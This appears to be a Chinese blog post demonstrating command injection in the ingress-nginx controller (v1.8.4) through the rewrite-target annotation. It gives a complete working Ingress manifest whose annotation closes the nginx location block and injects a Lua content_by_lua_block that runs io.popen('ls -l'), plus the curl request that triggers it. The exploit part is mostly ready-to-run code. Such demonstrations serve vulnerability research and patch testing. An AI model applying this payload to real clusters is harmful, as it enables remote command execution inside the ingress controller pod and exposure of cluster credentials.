本文详细描述了如何利用NginxIngress控制器中的`nginx.ingress.kubernetes.io/rewrite-target`标签,通过恶意字符串和Lua脚本执行命令的原理、示例及安全风险。部署一个名为ingress-exploit的Ingress,展示了如何利用这个漏洞获取容器内的文件列表。
查看版本
root@ubuntu-linux-22-04-desktop:/home/parallels/Desktop/test# k exec -it ingress-nginx-controller-86dcd6d496-cvtd4 -n ingress-nginx bash
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
node2:/etc/nginx$ /nginx-ingress-controller -v
-------------------------------------------------------------------------------
NGINX Ingress controller
Release: v1.8.4
Build: 05adfe3ee56fab8e4aded7ae00eed6630e43b458
Repository: https://github.com/kubernetes/ingress-nginx
nginx version: nginx/1.21.6
-------------------------------------------------------------------------------
安装
安装ingress-nginx
wget https://raw.githubusercontent.com/kubernetes/ingress-nginx/controller-v1.8.4/deploy/static/provider/cloud/deploy.yaml
k apply -f deploy.yaml
原理
nginx.ingress.kubernetes.io/rewrite-target标签会在nginx配置进行插入字符串,我们通过注入自己的恶意字符串,并且进行闭合,并且利用了lua脚本执行命令的功能,即可注入一个执行命令的路由来完成执行命令
nginx.ingress.kubernetes.io/rewrite-target: |
execute-command/ last; #用于将所有请求重定向到/execute-command
}
#注入了一个新路径,用于通过lua脚本执行命令
location execute-command/ {
content_by_lua_block {
local handle = io.popen("ls -l")
local result = handle:read("*a")
handle:close()
ngx.say(result)
}
}
location /fs/{
演示
部署的ingress如下所示
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: ingress-exploit
annotations:
kubernetes.io/ingress.class: "nginx"
nginx.ingress.kubernetes.io/rewrite-target: |
execute-command/ last;
}
location execute-command/ {
content_by_lua_block {
local handle = io.popen("ls -l")
local result = handle:read("*a")
handle:close()
ngx.say(result)
}
}
location /fs/{
spec:
rules:
- host: k8s.evil.me
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: exploit
port:
number: 8080
在容器中可以看到
curl --header "Host: k8s.evil.me" http://10.98.219.148/
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
